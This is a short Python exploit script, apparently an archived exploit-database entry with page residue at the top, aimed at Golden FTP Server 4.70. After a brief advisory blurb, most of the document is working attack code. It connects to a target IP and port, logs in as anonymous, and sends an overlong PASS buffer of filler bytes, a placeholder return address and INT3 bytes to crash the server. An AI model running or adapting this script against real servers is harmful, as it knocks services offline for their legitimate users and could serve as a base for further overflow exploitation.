39 lines
No EOL
962 B
Python
Executable file
39 lines
No EOL
962 B
Python
Executable file
source: https://www.securityfocus.com/bid/45924/info
|
|
|
|
Golden FTP Server is prone to a denial-of-service vulnerability.
|
|
|
|
Exploits will cause the application to crash, denying service to legitimate users.
|
|
|
|
Golden FTP Server 4.70 is vulnerable; other versions may also be affected.
|
|
|
|
import socket
|
|
import sys
|
|
import time
|
|
|
|
Bs = '\x42' * 4
|
|
|
|
buffer = '\x41' * 533 + Bs + '\xcc' * 300
|
|
|
|
if len(sys.argv) != 3:
|
|
print "Usage: ./goldenftp.py <ip> <port>"
|
|
sys.exit()
|
|
|
|
ip = sys.argv[1]
|
|
port = sys.argv[2]
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
try:
|
|
print "[*] Sending evil buffer"
|
|
s.connect((ip,int(port)))
|
|
s.recv(1024)
|
|
time.sleep(2)
|
|
s.send('USER anonymous'+ '\r\n')
|
|
s.recv(1024)
|
|
time.sleep(3)
|
|
s.send('PASS ' + buffer + '\r\n')
|
|
s.recv(1024)
|
|
time.sleep(1)
|
|
s.close()
|
|
except:
|
|
print "Can't Connect to Server"
|
|
sys.exit() |